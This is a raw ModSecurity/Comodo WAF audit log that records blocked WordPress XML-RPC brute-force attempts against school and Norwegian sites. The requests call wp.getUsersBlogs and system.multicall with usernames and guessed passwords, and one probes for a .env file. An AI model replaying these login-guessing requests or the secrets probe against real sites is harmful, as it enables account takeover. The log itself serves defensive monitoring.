--016dfe72-A-- [05/Jun/2025:16:17:03 +0700] aEFgj1wdJdhOudw5hdz0fwAAAJY 103.236.140.4 55810 103.236.140.4 8181 --016dfe72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --016dfe72-C-- wp.getUsersBlogs wakakur admin!@# --016dfe72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --016dfe72-E-- --016dfe72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115023415329 4947 (- - -) Stopwatch2: 1749115023415329 4947; combined=3833, p1=432, p2=3228, p3=0, p4=0, p5=102, sr=86, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --016dfe72-Z-- --28092472-A-- [05/Jun/2025:16:17:06 +0700] aEFgkn-K7ToMdu-YSIJLxwAAABI 103.236.140.4 55956 103.236.140.4 8181 --28092472-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --28092472-C-- wp.getUsersBlogs wakakur 1234%^&* --28092472-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28092472-E-- --28092472-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115026362552 4474 (- - -) Stopwatch2: 1749115026362552 4474; combined=3187, p1=379, p2=2655, p3=0, p4=0, p5=92, sr=78, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28092472-Z-- --62ccd32b-A-- [05/Jun/2025:16:18:04 +0700] aEFgzH-K7ToMdu-YSIJMpwAAAA8 103.236.140.4 58876 103.236.140.4 8181 --62ccd32b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --62ccd32b-C-- wp.getUsersBlogs wakakur BvtTest123 --62ccd32b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62ccd32b-E-- --62ccd32b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (78+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115084414748 5395 (- - -) Stopwatch2: 1749115084414748 5395; combined=3707, p1=478, p2=3069, p3=0, p4=0, p5=95, sr=77, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62ccd32b-Z-- --a312995b-A-- [05/Jun/2025:16:19:04 +0700] aEFhCOth7G2xELALzPZQOQAAANM 103.236.140.4 33626 103.236.140.4 8181 --a312995b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a312995b-C-- wp.getUsersBlogs wakakur mickey --a312995b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a312995b-E-- --a312995b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (50+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115144146832 4769 (- - -) Stopwatch2: 1749115144146832 4769; combined=3440, p1=425, p2=2705, p3=0, p4=0, p5=169, sr=85, sw=141, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a312995b-Z-- --7cf8d60a-A-- [05/Jun/2025:16:20:04 +0700] aEFhRH-K7ToMdu-YSIJPAQAAABI 103.236.140.4 36746 103.236.140.4 8181 --7cf8d60a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --7cf8d60a-C-- wp.getUsersBlogs wakakur anthony1 --7cf8d60a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cf8d60a-E-- --7cf8d60a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (72+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115204361532 5069 (- - -) Stopwatch2: 1749115204361532 5069; combined=3712, p1=430, p2=2973, p3=0, p4=0, p5=169, sr=84, sw=140, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cf8d60a-Z-- --7f20f959-A-- [05/Jun/2025:16:20:47 +0700] aEFhb3-K7ToMdu-YSIJPrgAAABQ 103.236.140.4 38960 103.236.140.4 8181 --7f20f959-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 491 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7f20f959-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminSoleh@[_host_].com --7f20f959-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f20f959-E-- --7f20f959-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.18.232.22 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115247467960 6027 (- - -) Stopwatch2: 1749115247467960 6027; combined=4406, p1=578, p2=3649, p3=0, p4=0, p5=106, sr=211, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f20f959-Z-- --2e50e01b-A-- [05/Jun/2025:16:21:04 +0700] aEFhgOth7G2xELALzPZRZwAAANg 103.236.140.4 39316 103.236.140.4 8181 --2e50e01b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --2e50e01b-C-- wp.getUsersBlogs wakakur poohbear --2e50e01b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e50e01b-E-- --2e50e01b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115264071611 5554 (- - -) Stopwatch2: 1749115264071611 5554; combined=3947, p1=474, p2=3246, p3=0, p4=0, p5=133, sr=104, sw=94, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e50e01b-Z-- --9c0ac509-A-- [05/Jun/2025:16:21:26 +0700] aEFhlirHpfaS2Cuwh8UB7gAAAFQ 103.236.140.4 39382 103.236.140.4 8181 --9c0ac509-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 50.6.205.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 50.6.205.26 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9c0ac509-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmindemo123456 --9c0ac509-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c0ac509-E-- --9c0ac509-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 50.6.205.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115286232750 4659 (- - -) Stopwatch2: 1749115286232750 4659; combined=3577, p1=377, p2=3015, p3=0, p4=0, p5=106, sr=80, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c0ac509-Z-- --03d39c7f-A-- [05/Jun/2025:16:22:04 +0700] aEFhvFwdJdhOudw5hdz3VwAAAJM 103.236.140.4 39474 103.236.140.4 8181 --03d39c7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --03d39c7f-C-- wp.getUsersBlogs wakakur william1 --03d39c7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03d39c7f-E-- --03d39c7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115324909924 5234 (- - -) Stopwatch2: 1749115324909924 5234; combined=3710, p1=466, p2=3056, p3=0, p4=0, p5=109, sr=105, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03d39c7f-Z-- --bbd50774-A-- [05/Jun/2025:16:23:04 +0700] aEFh-CrHpfaS2Cuwh8UB_wAAAE8 103.236.140.4 39574 103.236.140.4 8181 --bbd50774-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --bbd50774-C-- wp.getUsersBlogs wakakur 123456789q --bbd50774-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbd50774-E-- --bbd50774-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (39+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115384994133 5355 (- - -) Stopwatch2: 1749115384994133 5355; combined=3780, p1=470, p2=3095, p3=0, p4=0, p5=123, sr=102, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbd50774-Z-- --f94efc0a-A-- [05/Jun/2025:16:23:46 +0700] aEFiIuth7G2xELALzPZRkAAAANE 103.236.140.4 39654 103.236.140.4 8181 --f94efc0a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 146.190.29.219 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 146.190.29.219 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --f94efc0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f94efc0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749115426434641 884 (- - -) Stopwatch2: 1749115426434641 884; combined=340, p1=300, p2=0, p3=0, p4=0, p5=40, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f94efc0a-Z-- --86d8e515-A-- [05/Jun/2025:16:24:08 +0700] aEFiOFwdJdhOudw5hdz3XAAAAJY 103.236.140.4 39662 103.236.140.4 8181 --86d8e515-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --86d8e515-C-- wp.getUsersBlogs wakahumas r007p455w0rd --86d8e515-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86d8e515-E-- --86d8e515-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115448885067 5416 (- - -) Stopwatch2: 1749115448885067 5416; combined=3833, p1=485, p2=3176, p3=0, p4=0, p5=101, sr=89, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86d8e515-Z-- --884dea55-A-- [05/Jun/2025:16:25:08 +0700] aEFidCrHpfaS2Cuwh8UCLgAAAEc 103.236.140.4 39802 103.236.140.4 8181 --884dea55-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --884dea55-C-- wp.getUsersBlogs wakahumas wakahumas2001 --884dea55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --884dea55-E-- --884dea55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115508791824 5206 (- - -) Stopwatch2: 1749115508791824 5206; combined=3804, p1=451, p2=3168, p3=0, p4=0, p5=107, sr=86, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --884dea55-Z-- --003c9f74-A-- [05/Jun/2025:16:26:09 +0700] aEFisVwdJdhOudw5hdz3dAAAAJc 103.236.140.4 39974 103.236.140.4 8181 --003c9f74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --003c9f74-C-- wp.getUsersBlogs wakahumas Marketing2023_ --003c9f74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --003c9f74-E-- --003c9f74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (71+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115569664611 5368 (- - -) Stopwatch2: 1749115569664611 5368; combined=3839, p1=458, p2=3212, p3=0, p4=0, p5=100, sr=99, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --003c9f74-Z-- --2109170b-A-- [05/Jun/2025:16:27:10 +0700] aEFi7n-K7ToMdu-YSIJQOAAAABI 103.236.140.4 40178 103.236.140.4 8181 --2109170b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --2109170b-C-- wp.getUsersBlogs wakahumas Marketing_ --2109170b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2109170b-E-- --2109170b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (83+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115630376159 4336 (- - -) Stopwatch2: 1749115630376159 4336; combined=3312, p1=368, p2=2779, p3=0, p4=0, p5=96, sr=81, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2109170b-Z-- --63c2c256-A-- [05/Jun/2025:16:27:14 +0700] aEFi8n-K7ToMdu-YSIJQOQAAAAE 103.236.140.4 40180 103.236.140.4 8181 --63c2c256-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 139.59.17.212 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 139.59.17.212 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --63c2c256-C-- system.multicallmethodNamewp.getUsersBlogsparamswebzoWebzo@1234 --63c2c256-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63c2c256-E-- --63c2c256-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 139.59.17.212 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115634078974 4551 (- - -) Stopwatch2: 1749115634078974 4551; combined=3550, p1=381, p2=3011, p3=0, p4=0, p5=92, sr=78, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" 